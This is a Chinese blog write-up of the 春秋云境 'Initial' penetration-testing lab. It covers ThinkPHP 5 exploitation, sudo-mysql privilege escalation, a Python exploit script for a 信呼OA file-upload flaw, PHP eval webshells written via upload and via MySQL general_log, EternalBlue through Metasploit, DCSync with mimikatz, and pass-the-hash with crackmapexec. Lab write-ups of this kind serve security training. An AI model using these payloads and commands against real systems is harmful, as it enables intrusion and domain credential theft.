春秋云境 Initial

开始签到白嫖打完所有靶机计划!

Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

前置知识:

内网渗透学习(代理篇)
内网渗透学习(横向移动篇)
linux提权笔记

入口(172.22.1.15)

根据报错信息得知是ThinkPHP 5,存在nday,可以getshell

写马后查看用户是 www-data 尝试sudo提权

发现mysql有权限,在gtfobins查询得到命令sudo mysql -e '\! /bin/sh'

得到flag1:flag01: flag{60b53231-

内网

查看入口主机IP是 172.22.1.15

上传fscan扫C段

一共三台主机,信呼OA,存在ms17-010的windows和一台DC域控

上传iox构建socks代理

1
./iox proxy -l 6666

信呼OA(172.22.1.18)

存在弱口令使用admin/admin123登录

版本是v2.2.8,有文件上传漏洞

先在脚本同目录放一个1.php

1
<?=eval($_POST[1]);?>

exp,注意几个传参

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

成功上传shell

得到flag2:flag02: 2ce3-4813-87d4-

另一种打法

这台机子还部署了phpmyadmin

恰好root/root弱口令可以登录

查看目录

1
select @@basedir;

查看是否开启日志以及存放的日志位置

1
show variables like 'general%';

开启日志

1
set global general_log = ON;

设置日志保存位置

1
set global general_log_file = "C:/phpStudy/PHPTutorial/www/a.php"

写入shell

1
select '<?php eval($_POST[a]);?>';

getshell

DC(172.22.1.2)

fscan扫出来有ms17-010,直接用msfconsole打

1
2
3
4
5
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

加载mimikatz(kiwi就是msf内置的mimikatz模块的升级版)
通过DCSync导出域内哈希

1
2
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

抓到了Administrator的hash,加上之前扫出来 DC(172.22.1.2) 的 445 端口是开放的,可以利用 smb 哈希传递拿下域控制器

使用 crackmapexec 来进行PTH

1
proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag03.txt"

得到flag3:flag03: e8f88d0d43d6}

内网渗透
#内网渗透 #春秋云境 #专业徽章 #DCSync
春秋云境 Initial
https://www.dr0n.top/posts/5a3650d1/
作者
dr0n
发布于
2025年7月14日
更新于
2025年8月17日
许可协议